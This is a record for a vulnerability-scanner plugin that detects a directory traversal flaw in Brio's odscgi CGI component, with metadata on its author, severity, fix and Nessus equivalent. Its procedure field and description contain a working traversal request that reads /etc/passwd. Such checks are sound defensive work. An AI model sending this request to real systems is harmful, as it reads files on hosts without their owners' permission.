Plugin ID | 336 |
Plugin name | Brio Unix odscgi directory traversal |
Plugin filename | Brio Unix odscgi directory traversal.plugin |
Plugin filesize | 2288 bytes |
Plugin family | CGI |
Plugin created name | Marc Ruef |
Plugin created email | marc.ruef at computec.ch |
Plugin created web | http://www.computec.ch |
Plugin created company | computec.ch |
Plugin created date | 2005/01/09 |
Plugin version | 1.0 |
Plugin protocol | tcp |
Plugin port | 80 |
Plugin procedure exploit | open|send GET /ods-cgi/odscgi?HTMLFile=../../../../../../../../../../../../../../../etc/passwd HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/#.# 200 *root:* |
Plugin exploit accuracy | 98 |
Plugin comment | The NASL script is Copyright (C) 2003 Chris Foster |
Bug produced name | Brio |
Bug produced web | http://www.brio.com |
Bug affected | Brio |
Bug vulnerability class | Directory Traversal |
Bug description | Brio a popular web application interface has a directory traversal in the component 'odscgi'. An attacker may exploit this flaw to read arbitrary files on the remote host by submitting a URL like: http://www.example.com/ods-cgi/odscgi?HTMLFile=../../../../../../etc/passwd |
Bug solution | Check www.brio.com for updated software. |
Bug fixing time | Approx. 1 hour |
Bug exploit availability | Yes |
Bug remote | Yes |
Bug local | Yes |
Bug severity | High |
Bug popularity | 3 |
Bug simplicity | 8 |
Bug impact | 8 |
Bug risk | 6 |
Bug Nessus risk | Medium |
Bug check tools | Nessus can check this flaw with the plugin 15849 (Brio Unix Directory Traversal). |
Source Nessus ID | 15849 |
Source Literature | Hacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427 |
Source Misc. | http://www.computec.ch |